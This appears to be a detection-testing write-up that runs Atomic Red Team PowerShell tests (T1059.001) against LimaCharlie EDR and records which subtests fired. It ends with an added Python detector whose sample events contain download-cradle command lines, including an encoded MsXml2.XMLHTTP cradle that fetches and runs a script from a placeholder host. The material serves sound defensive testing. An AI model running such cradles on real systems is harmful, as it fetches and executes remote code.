CYBERSECURITY JOB HUNTING GUIDE
T1059.001 PowerShell
Author: Stefan Waldvogel
LimaCharlie vs. different PowerShell commands
Overview:
Description from ATT&CK
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
Source: github.com/redcanaryco/atomic-red-team/tree/master/atomics
Commands:
Invoke-AtomicTest T1059.001 -ShowDetailsBrief
Invoke-AtomicTest T1059.001 -CheckPrereqs
Invoke-AtomicTest T1059.001 -GetPrereqs
Invoke-AtomicTest T1059.001 -TestNumbers 1
Invoke-AtomicTest T1059.001 -Cleanup
Changes:
-none-
Limitations:
A specific .NET version (v2.0.50727, required by tests 11 and 12) was not installed.
Test number 10 did not work.
Results:
This section has 16 subtests.
Mimikatz: multiple detections
Bloodhound: sigma, detected
Bloodhound with download cradle: sigma, detected
Obfuscation with Mimikatz: sigma, detected suspicious PS and the download cradle
Mimikatz Cradlecraft PsSendKeys: Detected Mimikatz and WebDav Client execution.
Invoke-AppPathBypass: detected as Sdclt Child Processes
Invoke-AtomicTest T1059.001 -TestNumbers 7 (PowerShell MsXml COM): the PowerShell execution was detected, but the sigma rule set did not flag the download cradle; after switching to the soteria rule set the cradle was detected.
Invoke-AtomicTest T1059.001 -TestNumbers 8 (PowerShell XML request): the PowerShell execution was detected, but the sigma rule set did not flag the download cradle; after switching to the soteria rule set the cradle was detected.
PowerShell invoke mshta.exe: detected as MSHTA Spawning Windows Shell and other techniques
Test 10 looks buggy.
PowerShell Fileless script execution: detected as FromBase64String Command Line
Test 11 needs .NET v2.0.50727 (not installed)
Test 12 needs .NET v2.0.50727 (not installed)
NTFS Alternate Data Stream: detected as Run PowerShell Script from ADS
PowerShell Session Creation and Use: detected as Remote PowerShell Session Host Process (WinRM)
ATHPowerShellCommandLineParameter: multiple detections including WMI Spawning Windows PowerShell
ATHPowerShellCommandLineParameter encoded: multiple detections including WMI Spawning Windows PowerShell
ATHPowerShellCommandLineParameter encoded variant: multiple detections including WMI Spawning Windows PowerShell
ATHPowerShellCommandLineParameter encoded variant: multiple detections including WMI Spawning Windows PowerShell
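The detection names in the results above (FromBase64String Command Line, the download cradle that sigma missed for the MsXml COM and XML request tests, MSHTA and WMI spawning PowerShell, Sdclt child processes) all come down to three things a rule has to inspect in a process-creation event: the parent image, the command line after any -EncodedCommand payload has been decoded, and the fetch primitives inside it. The following is an added example, not code from this write-up and not LimaCharlie's sigma or soteria rules; the events are constructed, the detection names mirror the ones reported above, and the `.Load("http...")` pattern is an assumption about how the XML request cradle appears on a command line.

```python
"""Rule-style checks over constructed Windows process-creation events.

Added example; it is not part of the write-up and not an EDR rule set.
"""
import base64
import re

# Parent images whose child processes the results above flag.
SUSPICIOUS_PARENTS = {
    "mshta.exe": "MSHTA Spawning Windows Shell",
    "wmiprvse.exe": "WMI Spawning Windows PowerShell",
    "sdclt.exe": "Sdclt Child Processes",
}

# Fetch primitives that make a command line a download cradle. MsXml2.XMLHTTP is
# listed explicitly because sigma missed it in tests 7 and 8; the .Load("http...")
# form is an assumption about what the "XML request" test looks like.
CRADLE_RE = re.compile(
    r"net\.webclient|download(?:string|file|data)\s*\("
    r"|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b"
    r"|msxml2\.(?:server)?xmlhttp|winhttp\.winhttprequest"
    r"|\.load\(\s*['\"]https?://",
    re.IGNORECASE,
)

# -EncodedCommand and the unambiguous prefixes powershell.exe accepts for it,
# followed by the base64 blob.
ENCODED_ARG_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|enc[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE
)


def encode_command(script):
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line):
    """Return the script behind -EncodedCommand, or None if absent or not decodable."""
    m = ENCODED_ARG_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Return the detection names that fire for one process-creation event."""
    hits = []
    parent_name = event["parent_image"].rsplit("\\", 1)[-1].lower()
    child_name = event["image"].rsplit("\\", 1)[-1].lower()
    # Parent/child pairing applies to any child image.
    if parent_name in SUSPICIOUS_PARENTS:
        hits.append(SUSPICIOUS_PARENTS[parent_name])
    # Command-line content checks only make sense for PowerShell itself.
    if child_name not in ("powershell.exe", "pwsh.exe"):
        return hits
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits.append("Encoded PowerShell Command Line")
    # Scan the raw line and, when present, the decoded payload together.
    text = cmd if decoded is None else cmd + "\n" + decoded
    if re.search(r"frombase64string", text, re.IGNORECASE):
        hits.append("FromBase64String Command Line")
    if CRADLE_RE.search(text):
        hits.append("PowerShell Download Cradle")
    return hits


# Constructed sample events (not real telemetry). Hosts and URLs are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    # Net.WebClient cradle launched from a user shell
    {"image": PS, "parent_image": EXPLORER,
     "command_line": "powershell.exe -NoP -Exec Bypass -Command \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('https://example.invalid/s.ps1')\""},
    # mshta.exe spawning PowerShell
    {"image": PS, "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "powershell.exe -Command Get-Process"},
    # WMI-spawned, encoded, MsXml2.XMLHTTP cradle
    {"image": PS, "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": "powershell.exe -EncodedCommand " + encode_command(
         "$x=New-Object -ComObject MsXml2.XMLHTTP;"
         "$x.Open('GET','https://example.invalid/p.ps1',$false);$x.Send();IEX $x.responseText")},
    # FromBase64String in the clear (the blob is UTF-16LE 'Get-Process')
    {"image": PS, "parent_image": EXPLORER,
     "command_line": "powershell.exe -c \"IEX ([Text.Encoding]::Unicode.GetString("
                     "[Convert]::FromBase64String('RwBlAHQALQBQAHIAbwBjAGUAcwBzAA==')))\""},
    # benign admin command, should produce no hits
    {"image": PS, "parent_image": EXPLORER,
     "command_line": "powershell.exe -Command \"Get-ChildItem C:\\Users\""},
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS, 1):
        print(i, analyze(ev) or "no detection")
```

The decode step is the part worth copying: a rule that only looks at the raw command line sees nothing but a base64 blob for the encoded ATHPowerShellCommandLineParameter variants, so the cradle and FromBase64String checks run over the raw line and the decoded payload together.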
© 2021. This work is licensed under a CC BY-SA 4.0 license